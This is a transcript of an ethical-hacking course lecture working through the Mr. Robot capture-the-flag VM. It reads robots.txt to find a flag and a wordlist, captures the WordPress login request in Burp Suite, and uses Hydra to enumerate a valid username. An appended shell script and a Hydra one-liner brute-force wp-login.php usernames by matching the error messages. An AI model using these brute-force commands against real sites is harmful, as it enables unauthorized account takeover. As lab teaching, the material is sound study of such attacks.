In this course, we explore brute-force attacks, hacking WordPress, switching users, and SUID privilege escalation. We'll do this through a CTF (capture the flag) ethical hacking game called Mr. Robot.
Hi, within this lecture we're going to continue solving our CTF by following the leads we have. I'm going to stop DirBuster, because we already have what we need: we know there is a WordPress install here, and we're going to follow that road. Nikto didn't even complete its scan over there. Nikto can take a long time, so bear that in mind; a good habit is to start it as your first step, let it run in the background, and come back to the results later. As you can see, we started getting some responses, but it's going to take a while. We also have an /admin folder, I believe, so let me try going into it. That isn't what you'd expect for WordPress; the standard paths are wp-admin or wp-login.php. And it seems to redirect us to index.php, so there is nothing to pursue in that /admin folder. Let me try this one instead. As you can see, there is a page parameter here; maybe we can change it, or try something like the directory traversal we found before. So I'm going to come over here and write '?p=23'. And here you go, it just redirects us to index as well, so nothing happens with the page parameter. Maybe we can try page one or page zero, or try directory traversal like this, '../etc/passwd', and see what happens. Nothing is happening. In fact, I believe none of this is working because everything redirects us back to the original index page. So it's better to follow wp-login, or WordPress in general, okay? Over here we have the short link, which we already took a look at. And wp-login, we're definitely going to take a look at that one, okay?
And we have seen that over here as well. I believe we don't have wp-admin this time, we have wp-login. So far, so good. We can scroll through here a little and see if there is anything more interesting, but I don't think there is, right? So we're going to focus on wp-login. I believe we haven't checked robots.txt yet either, so I'm going to take a look at that as well, later on. I'm going to come over here, delete this and go to wp-login. And here you go, this is the WordPress login page. I'm going to go for '10.0.2.15' one more time, this time for wp-admin. It redirects us to the same page; as you can see, it's redirecting us to wp-login. So this is definitely going to be a wp-login thing. We have the WordPress admin login and some other stuff going on, but they are all related to wp-login, I believe, okay? Let me see what this is. We have /license.txt, which I don't think will give us anything, but it's worth a shot anyway. Let me see if we have anything else. No. Let me search for this one as well, '/license.txt'. Let me delete this extra slash, and here you go, this is just the WordPress license. Let me go back. Better yet, we can go for robots.txt, which is the first thing we should have been looking at anyway. As you can see, there are a couple of things here: we have fsocity.dic and key-1-of-3.txt. So we have found the first flag, I believe, key-1-of-3.txt, and I can get that easily from the URL. And we have fsocity.dic, which makes me think this is going to be a brute-forcing thing. By the way, if you don't know what robots.txt is, it's a file that tells website crawlers like Google's which paths not to look at, okay?
So: don't look at key-1-of-3.txt. Google respects that and doesn't index it with its crawler. But as hackers, we should look there first, precisely to see what has been disallowed for Google. I'm going to come over here to my notes.txt and paste the selection there. This is our first flag, okay? It was pretty easy to get. But rather than the flag, I believe we should focus on this fsocity.dic. So I'm going to open it to see what's inside this dictionary and save the file. The browser says it's C source code, but I don't think that's what it is; I'm just going to save the file and look at its content. If this is a dictionary, as we presume, then I believe we're going to have to do some kind of brute forcing. I'm going to cut this, put it in my CTF folder under MrRobot, and open it with any text editor. Here you go. There are thousands upon thousands of words in here, and they should be passwords or usernames or both; we don't know yet, okay? You can look through them and try to find something meaningful, but there are far too many to try one by one. We have some generic ones, like file and type, and we have duplicates, I believe. So it's going to take some time. Maybe we can just take the unique values, like we did in Bandit, to get rid of the duplicates. For example, if you search for Url, we have baseUrl; let's see if there is another Url. We have geoUrl, editUrl, another URL in uppercase only, and another baseUrl, I believe. So there are definitely duplicates, and the list isn't alphabetically ordered, so it's going to be a bit challenging, right?
So I'm going to come over here and clear this up. If you run 'ls -la', you can see fsocity.dic is here and it's seven MB, which is very big. So there is a lot in there and it's going to take some time. Most probably we're going to have to brute force here so that we can log in as a user. We don't know if these words are meant as usernames or as passwords, or both. If we are given a single dictionary, most probably it's there for both: we can find the username and the password in that dictionary. Otherwise they wouldn't give us anything and we would go for ready-made wordlists like rockyou.txt or the DirBuster medium list, as we have seen before. But this time we are given the dictionary, and only one, so I assume usernames and passwords are in the same list. We can use 'wpscan' for the brute forcing. If you write 'wpscan --help', you can see its documentation: we have enumeration, brute forcing, link detection, service detection, version detection, plugin detection. It's an all-in-one solution for WordPress penetration testing, and of course we're going to use it as well. But first we have to find the username, and only then the password, because we cannot find a password without a username. So first of all I'm going to search for any valid user inside that fsocity.dic we got from robots.txt. If we can find the user, then we'll find its password as well. We can use WPScan, we can use Hydra, and we can use Burp Suite. I'm going to try to show you all of them.
We're going to have to use WPScan eventually anyway, because this CTF is about WordPress pentesting. Let me open Burp Suite. Even though we can use Hydra, we need Burp Suite anyway, because we have to see the request and response details in order to use Hydra; I'm going to show you what I mean, don't worry. Since my proxy is up right now, I'm going to turn on FoxyProxy, or just do the proxy settings in Firefox. If you don't know how to use Burp Suite, please check my web pentesting course or look for a quick demonstration on YouTube, or just follow along with me. FoxyProxy connects Firefox to Burp Suite so that our requests and responses pass through it. Burp Suite is essentially a proxy: when we make a request or get a response, it is captured in Burp Suite first, so we can see it, analyze it, or even change it and send a different request or response. So I'm going to try with atilatil or atil123546. We don't have that kind of username or password, but of course we need to see the request. I'm going to right-click here and send it to Intruder. Intruder is the brute-forcing module of Burp Suite. Don't worry, we're not going to use it; I'm just showing you that brute forcing is possible with Burp Suite, I'm not going to turn this into a Burp Suite lecture. I'm going to clear all of these parameters. If I add payload positions, on username and password in the request, I can come over here to Payloads and choose a list. Of course, we'd also have to change the attack type, since Sniper is only for one parameter.
If we choose another attack type, we can use a different wordlist for each parameter and run it. This is Cluster bomb, and with it we can brute force directly inside Burp Suite. But again, we're not going to use it for this purpose; we have Hydra and we have the WordPress login. This is not a web penetration testing course; we're going to focus on gaining access and privilege escalation. So I'm going to send this to Repeater. Repeater is important. Make sure you turn Intercept off, by the way, and go back to Repeater. Now you can see the response: "Invalid username". The user atil doesn't even exist. In Repeater we can repeat as many times as we want: change the request and see what kind of response we get from the server, shown on the right-hand side. That is why we use Repeater. For example, I can change the login name and password here and hit Send to see what comes back from the server. It's practical and easy to use. So why do we use this? Because I'm going to show you how to brute force with Hydra, and for Hydra we're going to supply fsocity.dic as the wordlist. We're going to go for the username first; then we can find the password without even using Hydra, with other tools, so that we see every one of them. So let me stop blabbering and go for Hydra with a username wordlist. As you can see, if we supply an invalid username we get this "Invalid username" error message, and it will be different for a valid username: it will say the password is wrong, or something like that.
So if we get the "Invalid username" error message, we know for sure this isn't what we are looking for, because we want a valid username. Let's start typing: 'hydra -V' to make it verbose, and '-L' to supply the list we're going to work with. By the way, the list should be in the current folder; when you run 'ls' you can see fsocity.dic. So I'm going to say 'hydra -V -L fsocity.dic'. We're going to use this dictionary on the username, so for the password I'm just going to give something like 'test'. You can give anything you want, because we're not looking for the password, we're only looking for a username that is not invalid. So we have supplied the password and the username list (not a username itself, because we don't know it). Of course we also have to supply 10.0.2.15, which is our target. And now, this is the reason why we brought up Burp Suite in the first place: we can see the request details there, and we're going to need them. We need the log, pwd and wp-submit parameters, because that's how Hydra will know how to send the request to the server. And as you can see, that was a POST in Burp Suite, so I'm going to write 'http-post-form' here. After that, we have to specify the actual request parameters like pwd and so on, because they are not universal; they are specific to each website, and Hydra will not know where and how to send the request otherwise. So we're going to go to Burp Suite and get the request parameters to write them here. It will start with '/wp-login.php', then a colon, and then the parameters like this.
We don't need redirect_to, but we need this one. Let me copy it and paste it here. Here you go. So what happens is that the server understands these parameters: it looks for the username as log, the password as pwd, and the submit button as wp-submit, and this is different for every server, every backend. At the end I'm going to put another colon and write 'F=Invalid username', which is the error message we saw. What does it mean? If the response contains "Invalid username", Hydra will know that this attempt is a failure. And instead of giving the password as 123 and the username as atil, we're going to change these two values we supplied. For the password we could give anything, it won't matter, but you should know how it's done for the case where it does. So delete atil and write '^USER^' in its place, and for the password delete it and write '^PASS^' in the same way. ^USER^ will be replaced by each word from the list and ^PASS^ by the password. The password will be test in every request, so that part won't make sense on its own, but again, we are doing this because we need the username first. We're going to try every word in fsocity.dic to find a user that works, and if we find the user, then we can brute force the password. I'm going to hit Ctrl+C to stop Hydra (Ctrl+Z would only suspend it in the background). I believe we have found it. Here you go, it highlights the valid one. How does it know it's valid? Because we supplied the error message, taken from the response we saw in Burp Suite, to Hydra, and this one didn't get that message.
And apparently the login is Elliot, and it shows the password as test. Of course it's not test. It shows it in green because we supplied the error message "Invalid username", and when we give Elliot as the username we get something else. Let me try it and write it in. Here you go, it says: "The password you entered for the username Elliot is incorrect." So Hydra did its job. It found a username that exists, and now we have a user. We don't know yet if this is a privileged user or a regular one. If it doesn't work out, we can keep scanning and wait a little longer to see if there are other users in this list as well. But at least for now we have one user and we're going to go for it. I'm going to open my notes and write 'Elliot' there. So let's stop here and continue in the next lecture.
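Here is the username-enumeration step above done by hand, as an added example that is not part of the lecture: a POSIX shell script that first deduplicates fsocity.dic with sort -u (the duplicates we noticed earlier) and then posts each word to wp-login.php with curl, classifying the response the same way Hydra's F= failure string does. The target URL (http://10.0.2.15/wp-login.php), the dummy password and the sample responses in the comments are assumptions; the equivalent Hydra one-liner is in the comment at the top.

```shell
#!/bin/sh
# Added example, not the lecture's own commands. Equivalent hydra invocation
# (assumed target 10.0.2.15, wordlist on the username, fixed dummy password):
#   hydra -V -L fsocity.dic -p test 10.0.2.15 http-post-form \
#     "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"

TARGET="${TARGET:-http://10.0.2.15/wp-login.php}"   # assumed CTF target
FAIL_STRING="Invalid username"      # WordPress reply for a non-existent user
WRONG_PASS_STRING="is incorrect"    # "...for the username X is incorrect."

# Collapse duplicates (fsocity.dic repeats many words); prints the unique count.
dedup_wordlist() {   # $1 = raw list, $2 = output list
    sort -u "$1" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Classify one wp-login.php response body, mirroring hydra's F= logic:
#   invalid  -> username does not exist
#   valid    -> username exists, password wrong
#   unknown  -> anything else (lockout plugin, redirect, successful login)
classify_response() {
    case "$1" in
        *"$FAIL_STRING"*)       echo invalid ;;
        *"$WRONG_PASS_STRING"*) echo valid ;;
        *)                      echo unknown ;;
    esac
}

# POST one login attempt (stdin closed so curl never eats wordlist lines);
# kept in its own function so it can be stubbed with constructed responses.
fetch_login() {   # $1 = username, $2 = password
    curl -s -X POST "$TARGET" \
         --data-urlencode "log=$1" \
         --data-urlencode "pwd=$2" \
         --data-urlencode "wp-submit=Log In" < /dev/null
}

# Try every word from the list as a username with a dummy password; print the
# ones the server reports as existing, one per line.
enumerate_users() {   # $1 = (deduplicated) wordlist
    while IFS= read -r user; do
        if [ -n "$user" ]; then
            if [ "$(classify_response "$(fetch_login "$user" test)")" = valid ]; then
                printf '%s\n' "$user"
            fi
        fi
    done < "$1"
}

# Usage against the target (uncomment to run):
#   dedup_wordlist fsocity.dic fsocity.uniq
#   enumerate_users fsocity.uniq
```

The two failure strings are exactly what makes this work, and they are version-dependent: newer WordPress releases word these messages differently, so confirm them in Repeater first, as the lecture does, before pointing Hydra or this script at a target.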
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.